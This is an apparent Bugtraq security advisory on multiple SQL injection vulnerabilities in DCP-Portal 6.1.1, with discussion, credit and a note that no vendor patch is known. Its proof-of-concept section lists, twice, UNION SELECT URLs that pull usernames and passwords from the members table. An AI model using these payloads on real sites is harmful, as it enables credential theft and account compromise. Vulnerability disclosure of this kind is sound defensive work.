DCP-Portal Multiple SQL Injection Vulnerabilities
BID:12573
Info
DCP-Portal Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 12573 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2005 12:00AM |
| Updated: | Feb 16 2005 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to Exoduks <www.hackgen.org>. |
| Vulnerable: |
DCP-Portal DCP-Portal 6.1.1 |
| Not Vulnerable: | |
Discussion
DCP-Portal Multiple SQL Injection Vulnerabilities
DCP-Portal is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities are reported to affect DCP-Portal 6.1.1; earlier versions may also be affected.
DCP-Portal is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities are reported to affect DCP-Portal 6.1.1; earlier versions may also be affected.
Exploit / POC
DCP-Portal Multiple SQL Injection Vulnerabilities
No exploit is required.
The following proof of concepts are available:
http://www.example.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username]
http://www.example.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://www.example.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null, username,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username]
Replace [username] in the above examples with the user name you wish to retrieve the password for.
No exploit is required.
The following proof of concepts are available:
http://www.example.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username]
http://www.example.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://www.example.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null, username,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username]
Replace [username] in the above examples with the user name you wish to retrieve the password for.
Solution / Fix
DCP-Portal Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
DCP-Portal Multiple SQL Injection Vulnerabilities
References:
References:
- DCP-Portal Homepage (DCP-Portal)
- SQL injection bugs in DCP-Portal (hackgen
)